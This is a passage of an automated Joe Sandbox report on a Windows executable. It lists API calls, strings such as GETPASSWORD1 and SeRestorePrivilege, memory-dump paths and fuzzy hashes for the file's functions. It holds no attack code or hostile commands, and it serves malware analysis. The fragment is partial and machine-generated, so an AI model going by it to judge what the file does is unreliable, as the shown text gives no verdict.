                                                                        • Part of subcall function 007E8DCC: GetLastError.KERNEL32(?,?,007EC896,?,00000000,?,00000000,?,007EC8BD,?,00000007,?,?,007ECCBA,?,?), ref: 007E8DF4
                                                                      • _free.LIBCMT ref: 007EC829
                                                                      • _free.LIBCMT ref: 007EC83B
                                                                      • _free.LIBCMT ref: 007EC84D
                                                                      • _free.LIBCMT ref: 007EC85F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                      • String ID:
                                                                      • API String ID: 776569668-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • _wcslen.LIBCMT ref: 007D1FE5
                                                                      • _wcslen.LIBCMT ref: 007D1FF6
                                                                      • _wcslen.LIBCMT ref: 007D2006
                                                                      • _wcslen.LIBCMT ref: 007D2014
                                                                      • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,007CB371,?,?,00000000,?,?,?), ref: 007D202F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen$CompareString
                                                                      • String ID:
                                                                      • API String ID: 3397213944-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • _free.LIBCMT ref: 007E891E
                                                                        • Part of subcall function 007E8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,007EC896,?,00000000,?,00000000,?,007EC8BD,?,00000007,?,?,007ECCBA,?), ref: 007E8DE2
                                                                        • Part of subcall function 007E8DCC: GetLastError.KERNEL32(?,?,007EC896,?,00000000,?,00000000,?,007EC8BD,?,00000007,?,?,007ECCBA,?,?), ref: 007E8DF4
                                                                      • _free.LIBCMT ref: 007E8930
                                                                      • _free.LIBCMT ref: 007E8943
                                                                      • _free.LIBCMT ref: 007E8954
                                                                      • _free.LIBCMT ref: 007E8965
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                      • String ID:
                                                                      • API String ID: 776569668-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: _swprintf
                                                                      • String ID: %ls$%s: %s
                                                                      • API String ID: 589789837-2259941744
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\hT7clR9Gz2.exe,00000104), ref: 007E7FAE
                                                                      • _free.LIBCMT ref: 007E8079
                                                                      • _free.LIBCMT ref: 007E8083
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: _free$FileModuleName
                                                                      • String ID: C:\Users\user\Desktop\hT7clR9Gz2.exe
                                                                      • API String ID: 2506810119-1267314390
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 007E31FB
                                                                      • _abort.LIBCMT ref: 007E3306
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: EncodePointer_abort
                                                                      • String ID: MOC$RCC
                                                                      • API String ID: 948111806-2084237596
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • __EH_prolog.LIBCMT ref: 007C7406
                                                                        • Part of subcall function 007C3BBA: __EH_prolog.LIBCMT ref: 007C3BBF
                                                                      • GetLastError.KERNEL32(00000052,?,?,?,?,00000800,?,?,?,00000000,00000000), ref: 007C74CD
                                                                        • Part of subcall function 007C7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 007C7AAB
                                                                        • Part of subcall function 007C7A9C: GetLastError.KERNEL32 ref: 007C7AF1
                                                                        • Part of subcall function 007C7A9C: CloseHandle.KERNEL32(?), ref: 007C7B00
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                                      • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                      • API String ID: 3813983858-639343689
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                        • Part of subcall function 007C1316: GetDlgItem.USER32(00000000,00003021), ref: 007C135A
                                                                        • Part of subcall function 007C1316: SetWindowTextW.USER32(00000000,007F35F4), ref: 007C1370
                                                                      • EndDialog.USER32(?,00000001), ref: 007DAD98
                                                                      • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 007DADAD
                                                                      • SetDlgItemTextW.USER32(?,00000066,?), ref: 007DADC2
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: ItemText$DialogWindow
                                                                      • String ID: ASKNEXTVOL
                                                                      • API String ID: 445417207-3402441367
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • __fprintf_l.LIBCMT ref: 007CD954
                                                                      • _strncpy.LIBCMT ref: 007CD99A
                                                                        • Part of subcall function 007D1DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,00801030,?,007CD928,00000000,?,00000050,00801030), ref: 007D1DC4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                                                      • String ID: $%s$@%s
                                                                      • API String ID: 562999700-834177443
                                                                      • Opcode ID: 29de3fb1ecf759a75ebea8ae8f47f5ddf8f274585f314b37a61cf471d721de2b
                                                                      • Instruction ID: 0571b5e3d8500afba18d41b1d4ff7dcf6ccb16ad5201113a48deae10af259410
                                                                      • Opcode Fuzzy Hash: 29de3fb1ecf759a75ebea8ae8f47f5ddf8f274585f314b37a61cf471d721de2b
                                                                      • Instruction Fuzzy Hash: 8321D57640024CEEDB30DEA4CC05FEE7BA8EF05304F00412EF954962A2E73AEA54DB51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,007CAC5A,00000008,?,00000000,?,007CD22D,?,00000000), ref: 007D0E85
                                                                      • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,007CAC5A,00000008,?,00000000,?,007CD22D,?,00000000), ref: 007D0E8F
                                                                      • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,007CAC5A,00000008,?,00000000,?,007CD22D,?,00000000), ref: 007D0E9F
                                                                      Strings
                                                                      • Thread pool initialization failed., xrefs: 007D0EB7
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                      • String ID: Thread pool initialization failed.
                                                                      • API String ID: 3340455307-2182114853
                                                                      • Opcode ID: efcf3e941caa5a3712af1f98e77cca01a414c00df1676711ab9ffa3017414f1a
                                                                      • Instruction ID: 0dc7972329b7cdbd4206af96963be6086ee0b94af1208044109cbd354a4eeaaf
                                                                      • Opcode Fuzzy Hash: efcf3e941caa5a3712af1f98e77cca01a414c00df1676711ab9ffa3017414f1a
                                                                      • Instruction Fuzzy Hash: CE1142B16407089BC3215F669C84AA7FBECEB55754F545C2FE1DAC2200DA7959408B64
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                        • Part of subcall function 007C1316: GetDlgItem.USER32(00000000,00003021), ref: 007C135A
                                                                        • Part of subcall function 007C1316: SetWindowTextW.USER32(00000000,007F35F4), ref: 007C1370
                                                                      • EndDialog.USER32(?,00000001), ref: 007DB2BE
                                                                      • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 007DB2D6
                                                                      • SetDlgItemTextW.USER32(?,00000067,?), ref: 007DB304
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: ItemText$DialogWindow
                                                                      • String ID: GETPASSWORD1
                                                                      • API String ID: 445417207-3292211884
                                                                      • Opcode ID: e0ccaffebc0e1bc44faf22dee9f34743eefe8fbe181a35cc8ba926b537d85f09
                                                                      • Instruction ID: 47834a8f113b098ea1a87e810d1a71e1133cb7917f1f5f2056fbb9510f0f274c
                                                                      • Opcode Fuzzy Hash: e0ccaffebc0e1bc44faf22dee9f34743eefe8fbe181a35cc8ba926b537d85f09
                                                                      • Instruction Fuzzy Hash: 81118E32A40118F6DB219A649C49FFF3B7DFF19710F110026FA45B2284C7A9AA459671
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: Malloc
                                                                      • String ID: (}$2}$A
                                                                      • API String ID: 2696272793-517537644
                                                                      • Opcode ID: f5f914b7ba2d4f3db421fec2e2da2b129560b7922434e0a73e4893a7daea63e2
                                                                      • Instruction ID: ee1ce43404a25320be00a9e926886025745491c2d395ba7ec97a98f3f8df6c1c
                                                                      • Opcode Fuzzy Hash: f5f914b7ba2d4f3db421fec2e2da2b129560b7922434e0a73e4893a7daea63e2
                                                                      • Instruction Fuzzy Hash: F901DB75A01219ABDB14DFA4D854AEEBBF8BF09310B10416AE906E3250D7789A41DFA4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                      • API String ID: 0-56093855
                                                                      • Opcode ID: d51686f3fbaf385d534bd2e30eb56f112e3c85ff69802d1c5c0cfda1551e44c6
                                                                      • Instruction ID: c4fab17d6b495c9af0ede77274fa7997bb3196123ee3057106916617182ab283
                                                                      • Opcode Fuzzy Hash: d51686f3fbaf385d534bd2e30eb56f112e3c85ff69802d1c5c0cfda1551e44c6
                                                                      • Instruction Fuzzy Hash: 1B01B176604A49EFDF618FA4FC04AAA7BBAF708354B004027F94593331C6389C90DBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                        • Part of subcall function 007CE2E8: _swprintf.LIBCMT ref: 007CE30E
                                                                        • Part of subcall function 007CE2E8: _strlen.LIBCMT ref: 007CE32F
                                                                        • Part of subcall function 007CE2E8: SetDlgItemTextW.USER32(?,007FE274,?), ref: 007CE38F
                                                                        • Part of subcall function 007CE2E8: GetWindowRect.USER32(?,?), ref: 007CE3C9
                                                                        • Part of subcall function 007CE2E8: GetClientRect.USER32(?,?), ref: 007CE3D5
                                                                      • GetDlgItem.USER32(00000000,00003021), ref: 007C135A
                                                                      • SetWindowTextW.USER32(00000000,007F35F4), ref: 007C1370
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                                      • String ID: }$0
                                                                      • API String ID: 2622349952-681118444
                                                                      • Opcode ID: 2baf9aa8bad8f8f95e826c92ee0083367880053d0694c92a1deffeb3a917c19b
                                                                      • Instruction ID: 930bb35a54b97d8158218a73d2cc191a8250ddb7899ac437d5c6a1fad0ad7194
                                                                      • Opcode Fuzzy Hash: 2baf9aa8bad8f8f95e826c92ee0083367880053d0694c92a1deffeb3a917c19b
                                                                      • Instruction Fuzzy Hash: CEF031301042C8E6EF151F618C1EFA93B59BB4635DF44812DFD8455992CB7CC9A59B60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: __alldvrm$_strrchr
                                                                      • String ID:
                                                                      • API String ID: 1036877536-0
                                                                      • Opcode ID: 3257cbe3c23a9893bcf4e13c0b157f0aff40f0c1a093e58d5470b9d1dc85e048
                                                                      • Instruction ID: 52188c2d11fb1eae89e66e3253b7433da763933feaf5a8e33bd7fd991407c1c9
                                                                      • Opcode Fuzzy Hash: 3257cbe3c23a9893bcf4e13c0b157f0aff40f0c1a093e58d5470b9d1dc85e048
                                                                      • Instruction Fuzzy Hash: F8A14873A023C6DFEB21DF2AC8917AEBBE5EF59310F24416DE6459B291D23C8941C760
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,007C7F69,?,?,?), ref: 007CA3FA
                                                                      • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,007C7F69,?), ref: 007CA43E
                                                                      • SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,007C7F69,?,?,?,?,?,?,?), ref: 007CA4BF
                                                                      • CloseHandle.KERNEL32(?,?,?,00000800,?,007C7F69,?,?,?,?,?,?,?,?,?,?), ref: 007CA4C6
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: File$Create$CloseHandleTime
                                                                      • String ID:
                                                                      • API String ID: 2287278272-0
                                                                      • Opcode ID: 8b48d1393ebb833e71744c0890d9a79b89254d3adaed69fe6f12d68aeb84ad1d
                                                                      • Instruction ID: 4feeda6612b446d35a51cc8d55b88edbe332c523642eda095ab3c2ffe23147fe
                                                                      • Opcode Fuzzy Hash: 8b48d1393ebb833e71744c0890d9a79b89254d3adaed69fe6f12d68aeb84ad1d
                                                                      • Instruction Fuzzy Hash: 9041C0312483C5AAD731DF28DC59FAEBBE4AB95309F04091DB5D1D3180D6A8DA48DB53
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,2DE85006,007E47C6,00000000,00000000,007E57FB,?,007E57FB,?,00000001,007E47C6,2DE85006,00000001,007E57FB,007E57FB), ref: 007EC9D5
                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 007ECA5E
                                                                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 007ECA70
                                                                      • __freea.LIBCMT ref: 007ECA79
                                                                        • Part of subcall function 007E8E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,007E4286,?,0000015D,?,?,?,?,007E5762,000000FF,00000000,?,?), ref: 007E8E38
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                      • String ID:
                                                                      • API String ID: 2652629310-0
                                                                      • Opcode ID: cec7da0bb2761ea12a9bb78a883b33d34021ad69de56fca07c42c286ef889df5
                                                                      • Instruction ID: 69289685aaac80d43fa1ddb3b1e877422f7a3ddaecb5103859391ec6616e288d
                                                                      • Opcode Fuzzy Hash: cec7da0bb2761ea12a9bb78a883b33d34021ad69de56fca07c42c286ef889df5
                                                                      • Instruction Fuzzy Hash: 1331D072A0124AABDF25DF65CC45DBE7BA5EB49310B048128FC04E6250EB39DD51CB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetDC.USER32(00000000), ref: 007DA666
                                                                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 007DA675
                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 007DA683
                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 007DA691
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: CapsDevice$Release
                                                                      • String ID:
                                                                      • API String ID: 1035833867-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: _wcschr
                                                                      • String ID: .lnk$d}
                                                                      • API String ID: 2691759472-2346131625
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • _free.LIBCMT ref: 007EB324
                                                                        • Part of subcall function 007E9097: IsProcessorFeaturePresent.KERNEL32(00000017,007E9086,00000000,007E8D94,00000000,00000000,00000000,00000016,?,?,007E9093,00000000,00000000,00000000,00000000,00000000), ref: 007E9099
                                                                        • Part of subcall function 007E9097: GetCurrentProcess.KERNEL32(C0000417,007E8D94,00000000,?,00000003,007E9868), ref: 007E90BB
                                                                        • Part of subcall function 007E9097: TerminateProcess.KERNEL32(00000000,?,00000003,007E9868), ref: 007E90C2
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                      • String ID: *?$.
                                                                      • API String ID: 2667617558-3972193922
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • __EH_prolog.LIBCMT ref: 007C75E3
                                                                        • Part of subcall function 007D05DA: _wcslen.LIBCMT ref: 007D05E0
                                                                        • Part of subcall function 007CA56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 007CA598
                                                                      • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 007C777F
                                                                        • Part of subcall function 007CA4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,007CA325,?,?,?,007CA175,?,00000001,00000000,?,?), ref: 007CA501
                                                                        • Part of subcall function 007CA4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,007CA325,?,?,?,007CA175,?,00000001,00000000,?,?), ref: 007CA532
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: File$Attributes$CloseFindH_prologTime_wcslen
                                                                      • String ID: :
                                                                      • API String ID: 3226429890-336475711
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: _wcschr
                                                                      • String ID: *
                                                                      • API String ID: 2691759472-163128923
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen
                                                                      • String ID: }
                                                                      • API String ID: 176396367-4239843852
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • DialogBoxParamW.USER32(GETPASSWORD1,0001047C,007DB270,?,?), ref: 007DDE18
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: DialogParam
                                                                      • String ID: GETPASSWORD1$r}
                                                                      • API String ID: 665744214-3306145559
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                        • Part of subcall function 007CF2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 007CF2E4
                                                                        • Part of subcall function 007CF2C5: GetProcAddress.KERNEL32(008081C8,CryptUnprotectMemory), ref: 007CF2F4
                                                                      • GetCurrentProcessId.KERNEL32(?,?,?,007CF33E), ref: 007CF3D2
                                                                      Strings
                                                                      • CryptProtectMemory failed, xrefs: 007CF389
                                                                      • CryptUnprotectMemory failed, xrefs: 007CF3CA
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: AddressProc$CurrentProcess
                                                                      • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                                      • API String ID: 2190909847-396321323
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
